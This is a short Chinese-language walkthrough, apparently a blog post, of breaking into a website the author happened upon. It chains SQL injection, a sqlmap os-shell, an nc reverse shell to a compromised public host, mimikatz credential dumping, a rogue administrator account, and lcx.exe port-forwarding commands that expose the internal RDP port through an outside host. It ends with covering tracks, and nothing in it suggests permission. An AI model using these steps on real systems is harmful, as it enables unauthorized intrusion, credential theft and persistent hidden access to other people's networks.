首先,碰到了个站。注入漏洞,看一下是不是DBA权限。
当前用户是DBA权限,执行os-shell
可以直接执行命令,但是有时候会卡到链接超时,在执行os-shell的过程中有条信息,就是上面打红的地方(忽略掉打码技术),访问该地址它。
能直接上传文件,上传NC,反弹shell(sqlmap里shell实在卡得不行,回显太慢)
上传成功,首先执行NC反弹shell到公网肉鸡里
在肉鸡里开启监听,接受到shell。
没有公网地址,是内网机子。
其次,mimikatz抓管理员密码。
明文密码是抓不到的,抓到了哈希,拿去破解,破不出来。
算了,还是直接添加一个管理员账号吧。
看了一下端口,开了3389.
因为是内网机子,不能直接访问3389端口,这时就需要把内网的端口转发出来了。
用到的工具是lcx.exe
在公网上:lcx.exe -listen 2222 3333(公网监听2222端口,并把监听到的数据传到3333端口)
目标机:lcx.exe -slave xxx.xxx.xxx.xxx 2222 127.0.0.1 3389(把本地的3389端口转发到xxxx:2222公网端口)
用刚才添加的用户远程登入。
OK,成功链接。擦屁股走人